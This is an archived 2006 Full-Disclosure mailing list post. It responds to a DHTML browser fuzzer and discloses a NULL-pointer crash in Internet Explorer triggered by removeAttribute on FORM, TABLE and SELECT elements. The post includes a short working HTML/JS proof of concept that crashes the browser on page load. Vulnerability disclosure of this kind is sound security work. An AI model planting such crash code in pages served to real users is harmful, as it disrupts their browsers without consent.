lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <442250CA.5000308@gecadtech.com>
Date: Thu Mar 23 07:40:01 2006
From: stelian.ene at gecadtech.com (Stelian Ene)
Subject: Fun with DHTML

H D Moore wrote:
> How bugs can you find in your browser? The recent IE issues only scratched 
> the service of the DHTML/behavior bugs. The HTML/JS page below can be 
> used to find all sorts of bugs in different browsers. I stopped caring 
> about these after the first three invalid derefences.
> 
> http://metasploit.com/users/hdm/tools/hamachi/hamachi.html

Nice work !

On the IE front, besides the now known createTextRange() problem, no other high
risk behavior is observed.
However, you tool will uncover a *new, low risk IE vulnerability* (DoS). When
using the removeAttribute() method on certain HTML elements, a NULL pointer is
accessed, leading to a browser crash. The vulnerable elemets are FORM, TABLE,
and SELECT:

<body onload='nullptr()'>
<select id='s'>

<script>
function nullptr(){
	a=document.getElementById('s').removeAttribute(0);
}
</script>
</body>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ